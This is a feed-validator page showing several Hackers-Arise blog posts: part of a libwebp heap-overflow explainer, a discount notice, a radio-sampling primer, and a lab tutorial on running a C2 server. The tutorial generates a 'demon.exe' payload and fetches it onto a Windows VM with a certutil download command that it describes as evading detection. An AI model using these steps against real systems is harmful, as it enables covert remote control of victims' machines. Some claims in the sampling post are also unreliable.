  1631. <p style="text-align: justify;">Lossless compression is data compression in which the  original data can be perfectly reconstructed from the compressed data.  In other words, when a file undergoes lossless compression and is subsequently decompressed, no information is lost and the output is  identical to the original input. PNG, FLAC, GIF and ZIP are lossless compression algorithms. Lossless compression is used throughout the Internet where speed and efficiency are important but where integrity is also necessary.</p>
  1632. <p><br /></p>
  1633. <p style="text-align: justify;">Lossy graphic file compression is a method of data compression  where some of the file&apos;s data is permanently discarded during the  compression process. In the context of graphic files, this means that  some image information is lost when the file is compressed and cannot be  fully recovered upon decompression. The main objective is to  significantly reduce the file size to save storage space and decrease  load times, often at the cost of some degradation in image quality. Many graphic, audio and video files are compressed with lossy compression due to the fact that our eyes and ears are not so sensitive to pick up the change of a single pixel or note</p>
  1634. <p><br /></p>
  1635. <h2><strong>How Does the Exploit Work</strong></h2>
  1636. <p><br /></p>
  1637. <p style="text-align: justify;">This exploit creates a buffer overflow in the image decoder enabling the attacker to install their own remote code and control the device. libwebp uses a Huffman tables (developed by David A. Huffman in 1952, is a popular  method for lossless data compression. The central principle of Huffman  coding is to use shorter binary codes for more frequent elements in the  data and longer codes for less frequent elements) for compression and decompression. The compressed image files contain information about the shape of the Huffman tables and those tables are constructed by the decoder. These Huffman tables are constructed in a heap (heap is a memory area what application data is stored). A specially crafted WebP file can create a Huffman tree that overflows the heap and allows the attackers code to run</p>
  1638. <h2></h2>
  1639. <p><br /></p>
  1640. <figure><img src="https://static.wixstatic.com/media/6a4a49_07a1054452164910ada6af409fba1b7e~mv2.png/v1/fit/w_1000,h_772,al_c,q_80/file.png"></figure>
  1641. <p><br /></p>
  1642. <p><br /></p>
  1643. <h2><strong>Summary</strong></h2>
  1644. <h2></h2>
  1645. <p style="text-align: justify;">The libwebp vulnerability affects nearly every mobile device whether Android or iOS. It also affects the most commonly used browsers and many applications that enable graphics manipulations. The libwebp vulnerability may be the most important mobile device vulnerability of our times!</p>
  1646. <p><br /></p>
  1647. <p style="text-align: justify;">To learn more about this ubiquitous and sever vulnerability, attend our upcoming Android Hacking training.</p>
  1648. <p><br /></p>
  1649. <p><br /></p>
  1650. <figure><img src="https://static.wixstatic.com/media/6a4a49_f1e90d4fda4d4e5eacb61a72eb6f298e~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
  1651. <p><br /></p>
  1652. <p><br /></p>
  1653. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[50% off Subscriber and Subscriber Pro for those in non-industrialized Nations!]]></title><description><![CDATA[We recognize that incomes vary dramatically from one nation to the next and we don't want to exclude anyone from the best cybersecurity...]]></description><link>https://www.hackers-arise.com/post/50-off-subscriber-and-subscriber-pro-for-those-in-non-industrialized-nations</link><guid isPermaLink="false">6524b3837f96c5ba4496c2be</guid><pubDate>Tue, 10 Oct 2023 02:31:42 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_239684333f5440b5bd7ed693dc3fdb99~mv2.png/v1/fit/w_420,h_217,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p>We recognize that incomes vary dramatically from one nation to the next and we don&apos;t want to exclude anyone from the best cybersecurity training anywhere!</p>
  1654. <p><br /></p>
  1655. <p><br /></p>
  1656. <figure><img src="https://static.wixstatic.com/media/6a4a49_239684333f5440b5bd7ed693dc3fdb99~mv2.png/v1/fit/w_420,h_217,al_c,q_80/file.png"></figure>
  1657. <p><br /></p>
  1658. <p><br /></p>
  1659. <p>If you live in a non-industrialized nation, you can become a Subscriber or Subscriber Pro at 50% off!</p>
  1660. <p><br /></p>
  1661. <figure><img src="https://static.wixstatic.com/media/6a4a49_96901eedcdce43b4abefcd113c8f91c5~mv2.png/v1/fit/w_660,h_363,al_c,q_80/file.png"></figure>
  1662. <p>If you live in a country <strong>other</strong> than those listed above, you are eligible.</p>
  1663. <p><br /></p>
  1664. <p>Don&apos;t miss this opportunity. We have made 20 coupons available and when they are gone, they are gone.</p>
  1665. <p><br /></p>
  1666. <p><br /></p>
  1667. <p>To get you coupon, email<span style="color: #0D12E9;"> </span><u><a href="hackers-arise@protonmail.com" target="_blank"><span style="color: #0D12E9;">hackers-arise@protonmail.com</span></a></u><span style="color: #0D12E9;"> </span>and identify what nation you are from. If you qualify, we will send you a coupon for 50% off!</p>]]></content:encoded></item><item><title><![CDATA[Command &#38; Control Series Part II (Operating your own C2 Server)]]></title><description><![CDATA[Introduction. We already know what a C2, or Command and Control server is and, if you are not familiar you should take a look at our...]]></description><link>https://www.hackers-arise.com/post/command-control-series-part-ii-operating-your-own-c2-server</link><guid isPermaLink="false">64f147068332984579204ea9</guid><pubDate>Fri, 06 Oct 2023 14:09:18 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  1668. <figure><img src="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png"></figure>
  1669. <p><br /></p>
  1670. <p><br /></p>
  1671. <p><strong>Introduction.</strong></p>
  1672. <p><br /></p>
  1673. <p style="text-align: justify;"> <span style="color: #000000;">We already know what a C2, or Command and Control server is and, if you are not familiar you should take a look at our first post of this series. In the </span><u><a href="https://www.hackers-arise.com/post/command-control-series-part-i-installing-your-own-c2-server-on-kali-linux" target="_blank"><span style="color: #E51932;"><strong>first post of this series</strong></span></a></u><span style="color: #E51932;">,</span><span style="color: #000000;"> we walked through setting up and configuring one. Now, it&apos;s time to test its functionality and get acquainted with its operational behavior. It&apos;s important to note that, at this point, we are not yet obfuscating our communications; that is, we are not using any redirectors between the &apos;Client and the Server.&apos; As such, what you&apos;ll see is a direct connection between the victim and our C2 server. It&apos;s crucial to emphasize this because, in a real-world operation, the approach would be different.</span></p>
  1674. <p><br /></p>
  1675. <p><span style="color: #000000;"> At this stage, our C2 server is up and running. If you&apos;re familiar with our previous post, you&apos;ll recall that the last screenshot we shared is depicted in the image below.</span></p>
  1676. <p><br /></p>
  1677. <figure><img src="https://static.wixstatic.com/media/6a4a49_5d7c96a7444445dd9569a04420501d7a~mv2.png/v1/fit/w_1000,h_436,al_c,q_80/file.png"></figure>
  1678. <p><br /></p>
  1679. <p><span style="color: #000000;">At this point, we are going to build our first Listener.</span></p>
  1680. <p><br /></p>
  1681. <p><span style="color: #000000;"><strong>What is a Listener?</strong></span></p>
  1682. <p><br /></p>
  1683. <p style="text-align: justify;"><span style="color: #000000;"> In the context of a Command and Control (C2) server, a listener is essentially a server-side component designed to wait for incoming connections from compromised clients, often referred to as &quot;agents&quot; or &quot;bots.&quot; A listener operates on a specific port and may use a particular protocol (HTTP, HTTPS, DNS, TCP, etc.) to establish and maintain communication with the client-side malware that&apos;s executed on the target systems.</span></p>
  1684. <p><br /></p>
  1685. <p><span style="color: #000000;">Then go to the tab called &apos;View&apos; and select &apos;Listeners.&apos; On your PC, you should see something that looks like this:</span></p>
  1686. <p><br /></p>
  1687. <figure><img src="https://static.wixstatic.com/media/6a4a49_9f29b80e48a34458830827e4aefccec5~mv2.png/v1/fit/w_253,h_265,al_c,q_80/file.png"></figure>
  1688. <p><br /></p>
  1689. <p><br /></p>
  1690. <p style="text-align: justify;"> <span style="color: #000000;">After you select &apos;Listeners,&apos; a window will appear on your screen while this C2 offers a plethora of customization options, for the sake of keeping this demonstration straightforward, we&apos;ll stick to the default settings, as illustrated in the screenshot below:</span></p>
  1691. <p><br /></p>
  1692. <p style="text-align: justify;"><span style="color: #000000;">Go ahead and click save.</span></p>
  1693. <p><br /></p>
  1694. <figure><img src="https://static.wixstatic.com/media/6a4a49_dfed1b377bdc4e43a78c2aebc6ed1890~mv2.png/v1/fit/w_470,h_732,al_c,q_80/file.png"></figure>
  1695. <p><br /></p>
  1696. <p style="text-align: justify;"> <span style="color: #000000;">After following the previous steps, you can confirm that the Listener is set up and actively waiting for incoming connections. This will be evident as a new tab will open at the bottom of the C2 interface. Additionally, you&apos;ll see a notification in the top-right corner, confirming that the Listener has been initiated. The notification will display the name you&apos;ve assigned to it, in this case, &apos;Demon.&apos; The two images below illustrate what you should see on your screen.</span></p>
  1697. <p><br /></p>
  1698. <figure><img src="https://static.wixstatic.com/media/6a4a49_53a5004859e14577b331944b885a7cb2~mv2.png/v1/fit/w_1000,h_104,al_c,q_80/file.png"></figure>
  1699. <p><br /></p>
  1700. <figure><img src="https://static.wixstatic.com/media/6a4a49_a6c7ede7609044d8a35f47134454d7da~mv2.png/v1/fit/w_333,h_101,al_c,q_80/file.png"></figure>
  1701. <p><br /></p>
  1702. <p><span style="color: #000000;">It&apos;s time to generate our first payload.</span></p>
  1703. <p><br /></p>
  1704. <p><span style="color: #000000;"><strong>What is a payload?</strong></span></p>
  1705. <p><br /></p>
  1706. <p style="text-align: justify;"><span style="color: #000000;"> In the context of a Command and Control (C2) server, a &quot;payload&quot; refers to the malicious code or data that is sent from the C2 server to a compromised system (the &quot;client&quot;) or from the client back to the C2 server. Payloads can serve multiple purposes depending on what the attacker aims to achieve, such as executing specific commands, exfiltrating data, or providing additional functionality to the malware already on the compromised system. When it comes to the operational phase of a C2 framework, generating the payload is a crucial step. This is the component that you will need to deliver to the target system through some means, such as email phishing, drive-by downloads, or other attack vectors. </span></p>
  1707. <p><br /></p>
  1708. <p style="text-align: justify;"><span style="color: #000000;"> Once the payload is executed on the target system, it establishes a connection back to the C2 server, effectively allowing the attacker to control the compromised system. You can customize payloads to perform a range of tasks including, but not limited to, keylogging, capturing webcam and microphone data, stealing credentials, or conducting lateral movement within a network. Some advanced C2 frameworks allow for &quot;modular&quot; payloads, which can download additional functional modules from the C2 server as required, making them highly flexible and extensible.</span></p>
  1709. <p><br /></p>
  1710. <p><span style="color: #000000;">Go ahead and click on the &apos;Attack&apos; tab, then select the &apos;Payload&apos; option.</span></p>
  1711. <p><br /></p>
  1712. <figure><img src="https://static.wixstatic.com/media/6a4a49_1c27762cc68545ccb2d8f0fc0754b041~mv2.png/v1/fit/w_273,h_152,al_c,q_80/file.png"></figure>
  1713. <p><br /></p>
  1714. <p style="text-align: justify;"> <span style="color: #000000;">A window similar to the one shown in the image below will appear on your screen. As you can see, it offers a multitude of customization options for our payload. However, for the sake of keeping this post straightforward, we&apos;ll stick with the default settings this time. In future posts, we&apos;ll delve into how to tailor your payload using advanced techniques, which we also cover in-depth in our &apos;Infrastructure for Hackers&apos; course. So, without further ado, click &apos;Generate,&apos; using the example in the following image as your guide.</span></p>
  1715. <p><br /></p>
  1716. <figure><img src="https://static.wixstatic.com/media/6a4a49_155259ab079b48b3b60de07cde5173b0~mv2.png/v1/fit/w_469,h_579,al_c,q_80/file.png"></figure>
  1717. <p><br /></p>
  1718. <p><br /></p>
  1719. <p> <span style="color: #000000;">If all goes well, you should see a series of instructions appear at the bottom of the window as the payload is being generated. See the picture below:</span></p>
  1720. <p><br /></p>
  1721. <p><br /></p>
  1722. <figure><img src="https://static.wixstatic.com/media/6a4a49_46bb3eeb54504c9cb173a564d7c39812~mv2.png/v1/fit/w_471,h_583,al_c,q_80/file.png"></figure>
  1723. <p><br /></p>
  1724. <p><br /></p>
  1725. <p> <span style="color: #000000;">Once the payload is generated, you can navigate through the directory to locate where it has been saved. In my case, as you can see, it&apos;s located on the desktop.</span></p>
  1726. <p><br /></p>
  1727. <p><br /></p>
  1728. <figure><img src="https://static.wixstatic.com/media/6a4a49_47df910827b044c48ee1a9d09c0dfd43~mv2.png/v1/fit/w_613,h_431,al_c,q_80/file.png"></figure>
  1729. <p><br /></p>
  1730. <p style="text-align: justify;"> <span style="color: #000000;">Using the command python -m http.server spins up a simple HTTP server using Python&apos;s built-in HTTP server module. When you run this command, the current directory where the command is executed becomes the base directory for the server, allowing files to be served to clients requesting them over HTTP. The server listens on port 8000 by default, but you can specify a different port by appending it to the command, e.g., python -m http.server 8080. This is often used in C2 setups, penetration testing, and red teaming exercises for quick and easy file transfers, though it&apos;s important to note that it doesn&apos;t offer any encryption or authentication mechanisms out-of-the-box.</span></p>
  1731. <p><br /></p>
  1732. <p><span style="color: #000000;">Here&apos;s a quick rundown of what happens under the hood:</span></p>
  1733. <ol>
  1734.  <li><p><span style="color: #000000;"><strong>Initialization</strong></span><span style="color: #000000;">: The Python HTTP server module (http.server) is initialized. This is a simple, built-in HTTP server that comes packaged with Python&apos;s standard library.</span></p></li>
  1735.  <li><p><span style="color: #000000;"><strong>Socket Creation and Binding</strong></span><span style="color: #000000;">: A socket is created and bound to the host (usually localhost or 0.0.0.0 to listen on all available network interfaces) and port specified (default is 8000).</span></p></li>
  1736.  <li><p><span style="color: #000000;"><strong>Listening</strong></span><span style="color: #000000;">: The server starts listening for incoming HTTP requests. When a request is received, it reads the HTTP headers to determine what file or path the client is requesting.</span></p></li>
  1737.  <li><p><span style="color: #000000;"><strong>File Serving</strong></span><span style="color: #000000;">: It looks for the requested file in its base directory (the directory from which you ran the command). If it finds the file, it serves it back to the client. If not, it sends a 404 error.</span></p></li>
  1738.  <li><p><span style="color: #000000;"><strong>Logging</strong></span><span style="color: #000000;">: Most interactions are logged to the console, providing information on the client IP, requested path, and other details.</span></p></li>
  1739. </ol>
  1740. <p><span style="color: #000000;"> In a cyber operations context, while simple and quick, this approach should be used cautiously. Lack of encryption and authentication could pose a security risk, making the server and the files it serves vulnerable to unauthorized access or man-in-the-middle attacks. For more secure implementations, one could consider using more robust solutions like an Nginx or Apache server, potentially with SSL encryption.</span></p>
  1741. <p><br /></p>
  1742. <figure><img src="https://static.wixstatic.com/media/6a4a49_f26fc51f3a5846bdb3063d4da70c0afd~mv2.png/v1/fit/w_688,h_211,al_c,q_80/file.png"></figure>
  1743. <p><br /></p>
  1744. <p><br /></p>
  1745. <p> <span style="color: #000000;">Now, we&apos;ll employ a Windows 7 virtual machine as our target operating system, on which we&apos;ll open our Command Prompt (cmd) terminal.</span></p>
  1746. <p><br /></p>
  1747. <figure><img src="https://static.wixstatic.com/media/6a4a49_9fed0bb645c34aaa93003ec572fd869b~mv2.png/v1/fit/w_657,h_528,al_c,q_80/file.png"></figure>
  1748. <p><br /></p>
  1749. <p style="text-align: justify;"> </p>
  1750. <p style="text-align: justify;"> <span style="color: #000000;">In this part of the guide, we&apos;ll focus on an interesting Windows utility, certutil, to fetch our payload from the Command and Control (C2) server. In the context of a Red Team operation, downloading your payload securely and stealthily is crucial. While there are various ways to do it, certutil can come in handy as it&apos;s a legitimate built-in Windows utility mainly used for certificate management, but it can also be &apos;abused&apos; for our purpose.</span></p>
  1751. <p><span style="color: #000000;">Here&apos;s the command broken down:</span></p>
  1752. <ul>
  1753.  <li><p style="text-align: justify;"><span style="color: #000000;"><strong>certutil</strong></span><span style="color: #000000;">: This is the Windows utility we&apos;re using.</span></p></li>
  1754.  <li><p style="text-align: justify;"><span style="color: #000000;"><strong>-urlcache</strong></span><span style="color: #000000;">: This flag is for telling certutil to cache the object retrieved from the URL.</span></p></li>
  1755.  <li><p style="text-align: justify;"><span style="color: #000000;"><strong>-split</strong></span><span style="color: #000000;">: This flag specifies that the object should be split across several records in the cache. This is not particularly needed in our context but can be useful for large files.</span></p></li>
  1756.  <li><p style="text-align: justify;"><span style="color: #000000;"><strong>-f</strong></span><span style="color: #000000;">: This flag stands for &apos;force&apos;, ensuring that the download happens even if the file already exists.</span></p></li>
  1757.  <li><p style="text-align: justify;"><span style="color: #000000;"><strong>http://192.168.1.88:8000/demon.exe</strong></span><span style="color: #000000;">: This is the URL of your C2 server where demon.exe, your payload, resides.</span></p></li>
  1758. </ul>
  1759. <p style="text-align: justify;"><span style="color: #000000;"> The full command, certutil -urlcache -split -f http://192.168.1.88:8000/demon.exe, will therefore download demon.exe from your C2 server and store it locally on the machine you&apos;re operating on. One of the beauties of using certutil in this manner is that it often bypasses traditional detection methods due to its legitimate status. However, newer security solutions are getting better at detecting this kind of &apos;living-off-the-land&apos; technique, so your mileage may vary.</span></p>
  1760. <p><br /></p>
  1761. <p><br /></p>
  1762. <figure><img src="https://static.wixstatic.com/media/6a4a49_4b0f694b3bb14675bce4b8fe35d4f029~mv2.png/v1/fit/w_549,h_275,al_c,q_80/file.png"></figure>
  1763. <p><br /></p>
  1764. <p> <span style="color: #000000;">As you can observe in the screenshot below, the payload has been successfully transferred to the desktop of the target machine.</span></p>
  1765. <p><br /></p>
  1766. <figure><img src="https://static.wixstatic.com/media/6a4a49_ebd5cc0d03894fef84f42d80ad6d919c~mv2.png/v1/fit/w_354,h_269,al_c,q_80/file.png"></figure>
  1767. <p><br /></p>
  1768. <figure><img src="https://static.wixstatic.com/media/6a4a49_27d94c3ffccc47f1a92cd981b92b65df~mv2.png/v1/fit/w_801,h_236,al_c,q_80/file.png"></figure>
  1769. <p><br /></p>
  1770. <p><span style="color: #000000;">Now, go ahead and double-click on the payload on the target machine.</span></p>
  1771. <p><br /></p>
  1772. <figure><img src="https://static.wixstatic.com/media/6a4a49_39ac72f52bdb4b2aa0b5b255171f8c0e~mv2.png/v1/fit/w_1000,h_869,al_c,q_80/file.png"></figure>
  1773. <p><br /></p>
  1774. <p> <span style="color: #000000;">Instantly, you will observe that the right-hand pane of our C2 interface initiates the connection, allowing us full control over our target.</span></p>
  1775. <figure><img src="https://static.wixstatic.com/media/6a4a49_80fe4103d38d49aeb244d9b2deb676a1~mv2.png/v1/fit/w_1000,h_155,al_c,q_80/file.png"></figure>
  1776. <p><br /></p>
  1777. <p> <span style="color: #000000;">Now navigate to the &apos;View&apos; tab and select the &apos;Graphical View&apos; option. You&apos;ll be able to visualize the interaction between the C2 and the target machine, as illustrated in the image below.</span></p>
  1778. <p><br /></p>
  1779. <figure><img src="https://static.wixstatic.com/media/6a4a49_797f152783d14679a50edd042e9b3e4d~mv2.png/v1/fit/w_745,h_290,al_c,q_80/file.png"></figure>
  1780. <p><br /></p>
  1781. <p> <span style="color: #000000;">If you right-click on the target machine within the graphical view, you&apos;ll gain not only interactive access but also the ability to view process listings and file explorer details, as showcased in the images below.</span></p>
  1782. <p><br /></p>
  1783. <figure><img src="https://static.wixstatic.com/media/6a4a49_e3f6f502a5e3469aae4e219be3ba1086~mv2.png/v1/fit/w_736,h_416,al_c,q_80/file.png"></figure>
  1784. <p><br /></p>
  1785. <p><br /></p>
  1786. <figure><img src="https://static.wixstatic.com/media/6a4a49_b87ebf77e4ce4768b41f090d8b1fbea2~mv2.png/v1/fit/w_801,h_448,al_c,q_80/file.png"></figure>
  1787. <p><br /></p>
  1788. <figure><img src="https://static.wixstatic.com/media/6a4a49_6b908c17dfb244669eb177c58e042b51~mv2.png/v1/fit/w_683,h_609,al_c,q_80/file.png"></figure>
  1789. <p><br /></p>
  1790. <p><br /></p>
  1791. <p style="text-align: justify;"> <span style="color: #000000;">If you right-click on the target machine&apos;s graphical representation and choose the &apos;Interact&apos; option, you&apos;ll have the capability to execute various actions on the target system. To do this, navigate to the bottom of the newly-opened tab triggered by the aforementioned process and type &apos;help,&apos; followed by pressing Enter.</span></p>
  1792. <p><br /></p>
  1793. <figure><img src="https://static.wixstatic.com/media/6a4a49_c771fb573dbd43f59e041e9f2a4f52cf~mv2.png/v1/fit/w_885,h_808,al_c,q_80/file.png"></figure>
  1794. <p><br /></p>
  1795. <p style="text-align: justify;"> <span style="color: #000000;">Below, you&apos;ll find a screenshot that illustrates what you should be seeing on your computer at this point. This provides an overview of some of the actions you can execute on the target machine.</span></p>
  1796. <p><br /></p>
  1797. <figure><img src="https://static.wixstatic.com/media/6a4a49_03f777c4d26a405aacb03c13bb1fdac0~mv2.png/v1/fit/w_702,h_791,al_c,q_80/file.png"></figure>
  1798. <p><br /></p>
  1799. <p> <span style="color: #000000;">Go ahead and enter the &apos;checkin&apos; command. This will provide you with comprehensive information about the target system, as illustrated in the photos below.</span></p>
  1800. <p><br /></p>
  1801. <figure><img src="https://static.wixstatic.com/media/6a4a49_4553943d16e74443b1bb2998644db100~mv2.png/v1/fit/w_348,h_27,al_c,q_80/file.png"></figure>
  1802. <p><br /></p>
  1803. <figure><img src="https://static.wixstatic.com/media/6a4a49_b7d95efce8194fe18634700309dc2291~mv2.png/v1/fit/w_565,h_517,al_c,q_80/file.png"></figure>
  1804. <p><br /></p>
  1805. <p style="text-align: justify;"> <span style="color: #000000;">This has been merely a small glimpse into the capabilities you can unlock with just a few commands. Imagine the endless possibilities when you master comprehensive infrastructure deployment systems along with intricate scenarios. To delve deeper into this subject, I&apos;ve listed two potential options below that you might want to explore.</span></p>
  1806. <p><br /></p>
  1807. <p><em><span style="color: #000000;"><strong>Smouk out!</strong></span></em></p>
  1808. <p><br /></p>
  1809. <p style="text-align: justify;"><em><span style="color: #000000;"><span style="background-color: #a5bbcf;">If you liked what you saw, you might be interested in our</span></span></em><em><span style="background-color: #a5bbcf;"> </span></em><u><a href="https://hackersarise.thinkific.com/courses/infrastructure-basics-for-hackers" target="_blank"><em><span style="color: #0D12E9;"><strong>Hacking Infrastructure course</strong></span></em></a></u><em><span style="background-color: #a5bbcf;">, or </span></em><em><span style="color: #000000;"><span style="background-color: #a5bbcf;">perhaps you&apos;d like to consider becoming part of our community by becoming a</span></span></em><em><span style="background-color: #a5bbcf;"> </span></em><u><a href="https://www.hackers-arise.com/online-store/Subscriber-3-years-of-training-p134507114" target="_blank"><em><span style="color: #0D12E9;"><strong>Subscriber PRO.</strong></span></em></a></u> </p>
  1810. <p><br /></p>
  1811. <p><br /></p>
  1812. <p><br /></p>
  1813. <p><br /></p>
  1814. <p><br /></p>
  1815. <figure><img src="https://static.wixstatic.com/media/6a4a49_f1e90d4fda4d4e5eacb61a72eb6f298e~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
  1816. <p><br /></p>
  1817. <p><br /></p>
  1818. <p><br /></p>]]></content:encoded></item><item><title><![CDATA[Radio Basics for Hackers, Part 3: Sampling ]]></title><description><![CDATA[Welcome back my aspiring cyber warriors! Sampling is the process of converting a continuous signal into a discrete signal. In the context...]]></description><link>https://www.hackers-arise.com/post/radio-basics-for-hackers-part-3-sampling</link><guid isPermaLink="false">6494bdeaf82e7a34f83fefcb</guid><pubDate>Thu, 05 Oct 2023 15:50:50 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_1fdcac2630dd491f9fabcedeec7b3dbc~mv2.jpg/v1/fit/w_600,h_480,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[<p><br /></p>
  1819. <p>Welcome back my aspiring cyber warriors!</p>
  1820. <p><br /></p>
  1821. <p style="text-align: justify;">Sampling is the process of converting a continuous signal into a discrete signal. In the context of radio signals, sampling is the process of converting an<strong> analog</strong> radio signal into a<strong> digital</strong> signal. Remember, the original signal is all analog but our computer systems are all digital. Sampling enables the process of re-creating a digital signal that resembles the original analog signal.</p>
  1822. <p style="text-align: justify;">
  1823. The Nyquist–Shannon sampling theorem states that in order to perfectly reconstruct an analog signal from its samples, the sampling frequency must be greater than twice the highest frequency component of the analog signal. This makes sense as we must capture enough samples to reconstruct the signal and twice the frequencies means 2 samples per wave. Anything less risks producing a digital signal that does not represent the original signal.</p>
  1824. <p><br /></p>
  1825. <p><br /></p>
  1826. <figure><img src="https://static.wixstatic.com/media/6a4a49_1fdcac2630dd491f9fabcedeec7b3dbc~mv2.jpg/v1/fit/w_600,h_480,al_c,q_80/file.png"></figure>
  1827. <p><br /></p>
  1828. <p style="text-align: justify;">
  1829. For example, if an analog radio signal has a bandwidth of 100 kHz, then the sampling frequency must be greater than 200 kHz. This means that the analog signal must be sampled at least 200,000 times per second.</p>
  1830. <p style="text-align: justify;">
  1831. The sampling process is performed by an analog-to-digital converter (ADC). The ADC converts the analog signal into a digital signal by measuring the amplitude of the signal at regular intervals. The amplitude measurements are then stored as a sequence of numbers.</p>
  1832. <p style="text-align: justify;">
  1833. The digital signal can then be processed by a digital signal processor (DSP). The DSP can perform a variety of operations on the digital signal, such as filtering, modulation, and demodulation.</p>
  1834. <p style="text-align: justify;">
  1835. The digital signal can then be transmitted over a digital medium, such as a computer network or a cellular network.</p>
  1836. <p style="text-align: justify;">
  1837. Sampling is a critical part of radio communications. It allows analog signals to be converted into digital signals, which can then be processed and transmitted over digital media.</p>
  1838. <p style="text-align: justify;">
  1839. Here are some of the benefits of sampling:
  1840. </p>
  1841. <ul>
  1842.  <li><p style="text-align: justify;"><strong>Increased accuracy:</strong> Sampling allows for more accurate representation of the analog signal.</p></li>
  1843.  <li><p style="text-align: justify;"><strong>Reduced noise:</strong> Sampling can reduce noise by averaging the signal over multiple samples.</p></li>
  1844.  <li><p style="text-align: justify;"><strong>Increased bandwidth:</strong> Sampling can increase the bandwidth of the signal, which allows more information to be transmitted.</p></li>
  1845. </ul>
  1846. <p><br /></p>
  1847. <p style="text-align: justify;">Sampling is a powerful technique that can be used to improve the performance of radio communications. It is a valuable tool for anyone who wants to transmit analog signals over digital media.</p>]]></content:encoded></item></channel></rss>

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

  1. Download the "valid RSS" banner.

  2. Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)

  3. Add this HTML to your page (change the image src attribute if necessary):

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=https%3A//www.hackers-arise.com/blog-feed.xml

Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda